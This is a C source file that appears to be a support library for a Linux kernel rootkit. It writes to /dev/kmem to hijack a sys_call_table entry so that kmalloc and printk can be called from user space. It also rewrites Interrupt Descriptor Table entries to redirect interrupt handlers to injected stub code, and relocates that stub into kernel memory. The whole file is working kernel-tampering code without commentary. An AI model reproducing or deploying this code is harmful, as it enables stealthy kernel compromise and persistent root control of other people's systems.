#include "kmem.h"


//KMEM stuff

int kmem_open(void)
    {
    return(open(KMEM,O_RDWR));
    }
    
int kmem_close(int fd)
    {
    return(close(fd));
    }

void kmem_read(void *m,unsigned off,int size)
{
  int fd_kmem = kmem_open();
  
  if(lseek(fd_kmem,off,SEEK_SET) != off)
    {
      fprintf(stderr,"Error kmem read. Are you root? \n");
      exit(-1);
    }
  if(read(fd_kmem,m,size)!= size)
    {
      fprintf(stderr,"Error read kmem\n");
      exit(-1);
    }
    
  kmem_close(fd_kmem);
}

void kmem_write(void *m,unsigned off,int size)
{
  int fd_kmem = kmem_open();

  if(lseek(fd_kmem,off,SEEK_SET) != off)
    {
      fprintf(stderr,"Error kmem write. Are you root? \n");
      exit(-1);
    }
  if(write(fd_kmem,m,size)!= size)
    {
      fprintf(stderr,"Error write kmem\n");
      exit(-1);
    }
    
  kmem_close(fd_kmem);
}

unsigned long ksym_get(char *sym)
    {
    int nb_sym,i;
    struct kernel_sym *ksyms;
    unsigned long addr = 0;
    
    nb_sym = get_kernel_syms(NULL);
    ksyms = (struct kernel_sym *) malloc(sizeof(struct kernel_sym) * (nb_sym+1));
    
    if(!ksyms)
	{
	printf("Malloc failed , abording.\n");
	exit(-1);
	}
    else
	{
	get_kernel_syms(ksyms);
	for(i=0;i < nb_sym && !addr;++i)
	    {
	    if(!strncmp(ksyms[i].name,sym,strlen(sym)))
		addr = ksyms[i].value;
	    }
	}
	
    return addr;
    }

unsigned long kmem_alloc(int size)
    {
    unsigned long sys_call_table = ksym_get("sys_call_table");
    unsigned long kmalloc	 = ksym_get("kmalloc"); 
    unsigned long hijacked_addr;
    unsigned long hijacked_save;
    unsigned long kbuf_addr;
    
    if(!sys_call_table || !kmalloc)
	{
	printf("symbol can't be resolved, abording !\n");
	exit(-1);
	}
    
    hijacked_addr = sys_call_table + 4 * HIJACK;
    kmem_read(&hijacked_save,hijacked_addr,4);
    
    kmem_write(&kmalloc,hijacked_addr,4);
    kbuf_addr = syscall(HIJACK,size,GFP_KERNEL);
    kmem_write(&hijacked_save,hijacked_addr,4);
    
    return kbuf_addr;
    }
    
void printk(char *string)
    {
    unsigned long printk = ksym_get("printk");
    unsigned long sys_call_table = ksym_get("sys_call_table");
    unsigned long hijacked_addr;
    unsigned long hijacked_save;
    
    if(!printk || !sys_call_table)
	{
	printf("symbol can't be resolved\n");
	exit(-1);
	}
    
    hijacked_addr = sys_call_table + 4 * HIJACK;
    kmem_read(&hijacked_save,hijacked_addr,4);
    
    kmem_write(&printk,hijacked_addr,4);
    syscall(HIJACK,string,GFP_KERNEL);
    kmem_write(&hijacked_save,hijacked_addr,4);
    	
    return;
    }


//IDT stuff

unsigned long get_addr_idt (void)
{
  unsigned char idtr[6];
  unsigned long idt;
  __asm__ volatile ("sidt %0": "=m" (idtr));
  idt = *((unsigned long *) &idtr[2]);
  return(idt);
}

unsigned short get_size_idt(void)
{
  unsigned idtr[6];
  unsigned short size;
  __asm__ volatile ("sidt %0": "=m" (idtr));
  size = *((unsigned short *) &idtr[0]);
  return(size);
}

void * get_stub_from_idt (int n)
{
  unsigned long ptr_idt_table = get_addr_idt();
  unsigned short offset_l,offset_h;
  struct descriptor_idt *idte = (struct descriptor_idt *) malloc(sizeof(struct descriptor_idt));
  
  kmem_read(idte,ptr_idt_table+8 * n,sizeof(struct descriptor_idt));
  offset_l = idte->offset_low;
  offset_h = idte->offset_high; 
  return ((void *) ((offset_h << 16 ) + offset_l));
}

void hook_stub(int n,void *new_stub)
{
  unsigned long new_addr=(unsigned long)new_stub;
  unsigned long ptr_idt_table = get_addr_idt();
  unsigned short n_offset_high;
  struct descriptor_idt *idte = (struct descriptor_idt *) malloc(sizeof(struct descriptor_idt));
  
  ptr_idt_table = ptr_idt_table + 8 * n;
  
  kmem_read(idte,ptr_idt_table,sizeof(struct descriptor_idt));
  
  idte->offset_high = (unsigned short) (new_addr >> 16);
  idte->offset_low  = (unsigned short) (new_addr & 0x0000FFFF); 
    
  kmem_write(idte,ptr_idt_table,sizeof(struct descriptor_idt));
      
  return;
}


//RELOCATE STUFF , thanks spacewalker :)
void relocate_stub(unsigned long where,unsigned long stub_begin,unsigned long stub_end)
{
  unsigned long *ptr  = (void *)stub_begin;
  unsigned long *end  = (void *)stub_end;
  unsigned long debut = (unsigned long)stub_begin;
  unsigned long fin   = (unsigned long)stub_end;

  while(ptr<end)
    {
      if(*ptr>=debut && *ptr<=fin)
	{
	  *ptr=*ptr-debut+where;
	  ptr++;
	}
      else
	ptr=(unsigned long *)((char *)ptr+1);
    }
}



